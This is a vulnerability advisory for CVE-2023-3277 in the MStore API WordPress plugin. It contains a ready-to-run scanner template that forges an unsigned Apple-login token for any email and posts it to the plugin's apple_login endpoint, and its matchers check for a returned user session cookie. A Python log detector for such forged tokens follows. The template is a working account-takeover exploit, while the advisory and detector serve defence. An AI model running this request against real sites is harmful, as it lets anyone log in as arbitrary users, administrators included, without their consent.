The MStore API plugin for WordPress is vulnerable to Unauthorized Account Access and Privilege Escalation in versions up to, and including, 4.10.7 due to improper implementation of the Apple login feature. This allows unauthenticated attackers to log in as any user as long as they know the user's email address.
PoC code [public]
id: CVE-2023-3277
info:
  name: MStore API <= 4.10.7 - Unauthorized Account Access and Privilege Escalation
  author: daffainfo
  severity: critical
  description: |
    The MStore API plugin for WordPress is vulnerable to Unauthorized Account Access and Privilege Escalation in versions up to, and including, 4.10.7 due to improper implementation of the Apple login feature. This allows unauthenticated attackers to log in as any user as long as they know the user's email address.
  impact: |
    Attackers can log in as any user and escalate privileges, potentially leading to full account compromise.
  remediation: |
    No patch available yet; monitor for updates from the developer and apply patches as soon as they are released.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c7c0c35-5f44-488f-9fe1-269ea4a73854?source=cve
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2988788%40mstore-api%2Ftrunk&old=2985882%40mstore-api%2Ftrunk&sfp_email=&sfph_mail=
    - https://plugins.trac.wordpress.org/browser/mstore-api/trunk/controllers/flutter-user.php#L821
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3277
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3277
    epss-score: 0.3254
    epss-percentile: 0.9668
    cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: inspireui
    product: mstore_api
    framework: wordpress
    fofa-query: body="/wp-content/plugins/mstore-api/"
    publicwww-query: "/wp-content/plugins/mstore-api/"
  tags: cve,cve2023,wordpress,wp,wp-plugin,inspireui,mstore_api,auth-bypass,vkev
variables:
  email: "{{email}}"
  token: '{{concat(".", base64("{\"email\":\"" + email + "\"}"), ".")}}'
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"
http:
  - raw:
      - |
        POST /wp-json/api/flutter_user/apple_login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"token":"{{token}}","first_name":"{{firstname}}","last_name":"{{lastname}}"}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"wp_user_id"'
          - '"cookie"'
          - '"user_login"'
        condition: and
      - type: word
        part: content_type
        words:
          - application/json
      - type: status
        status:
          - 200
# digest: 4a0a00473045022022b8be7f5987abd6bce030c56d00367d45d8bcb517621c56cd91c0af378c1ab3022100981f5a31e6082902eeed80ef6988d760f5b79442dc33973ee3871f19ead5e827:922c64590222798bb761d5b6d8e72950
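A detection-side companion to the template above, added here as an example (it is not part of the original template or of the plugin's code): the token the template builds is `.` + base64 payload + `.`, a JWT-shaped string with an empty header and an empty signature, so a log or WAF check can flag `apple_login` requests whose token has that shape. The record fields (`src`, `method`, `path`, `body`), the function names and the sample records are assumptions constructed for illustration.

```python
import base64
import json

APPLE_LOGIN_PATH = "/wp-json/api/flutter_user/apple_login"  # endpoint named in the template

def b64url_json(obj):  # encode a dict as an unpadded base64url JWT segment (for the sample)
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")

def decode_segment(segment):  # JWT segment -> dict, or None if it is not base64 JSON
    try:
        value = json.loads(base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4)))
    except ValueError:  # bad padding, bad UTF-8 or bad JSON
        return None
    return value if isinstance(value, dict) else None

def classify_token(token):
    """Return why a token cannot be a signed identity token, or None if its shape is plausible."""
    parts = token.split(".") if isinstance(token, str) else []
    if len(parts) != 3:
        return "not a three-segment JWT"
    if not parts[2]:
        return "empty signature segment"
    header = decode_segment(parts[0])
    if header is None or str(header.get("alg", "none")).lower() == "none":
        return "no usable signing algorithm in header"
    return None  # shape check only; the server must still verify the signature

def scan_requests(records):
    """Return (src, reason) for each logged apple_login POST whose token is unsigned."""
    hits = []
    for rec in records:
        if rec.get("method") != "POST" or not rec.get("path", "").startswith(APPLE_LOGIN_PATH):
            continue
        try:
            body = json.loads(rec.get("body", ""))
        except ValueError:
            body = None
        reason = classify_token(body.get("token") if isinstance(body, dict) else None)
        if reason:
            hits.append((rec.get("src"), reason))
    return hits

EMAIL_SEG = b64url_json({"email": "user@example.com"})
SAMPLE = [  # constructed records, not real traffic; the log field names are assumptions
    {"src": "198.51.100.7", "method": "POST", "path": APPLE_LOGIN_PATH,
     "body": json.dumps({"token": "." + EMAIL_SEG + "."})},
    {"src": "203.0.113.9", "method": "POST", "path": APPLE_LOGIN_PATH,
     "body": json.dumps({"token": b64url_json({"alg": "RS256"}) + "." + EMAIL_SEG + ".c2ln"})},
]
```

A `None` result only means the token has the shape of a signed JWT; it says nothing about whether the signature is valid.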